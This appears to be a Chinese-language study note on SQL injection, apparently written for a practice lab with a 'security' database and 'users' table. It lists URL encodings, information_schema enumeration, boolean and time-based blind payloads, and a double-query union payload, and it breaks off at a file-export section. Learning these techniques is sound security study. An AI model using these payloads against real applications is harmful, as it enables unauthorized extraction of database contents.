SQL注入学习笔记（一）

空格是%20，单引号是%27， 井号是%23，双引号是%22 //常见urlencode

order by 3 //猜字段个数

select 1, 2, 3 //增加临时列

mysqli_fetch_array(conn,sql) //返回第一行记录

concat_ws(char(32,58,32), ‘语句1’, ‘语句2’…) //连接成字符串

limit 0,1 //选定待查询的记录行

substr((%s),1,1)

//爆库, 爆表, 爆字段

database: information_schema(包含了mysql服务器所有信息)

table: schemata (schema_name)

tables (table_schema, table_name)

columns (table_schema, table_name, column_name)

//布尔盲注

and length(database())>=0 %23

and ascii(substr(database(),1,1))>=0 %23

and (select count(table_name) from information_schema.tables where table_schema=’security’)>=0 %23

and (select length(table_name) from information_schema.tables where table_schema=’security’ limit 0,1)>=0 %23

and ascii(substr(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)>=0 %23

and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)>=0 %23

and (select length(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)>=0 %23

and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),1,1))>=0 %23

//基于时间盲注

and if((注入布尔判断语句), 1, sleep(5)) %23

//聚合函数+分组语句->双注入

union select 1 from (select count(*), concat(floor(rand()*2), (注入爆数据语句))a from information_schema.tables group by a)b%23

//导出文件

select “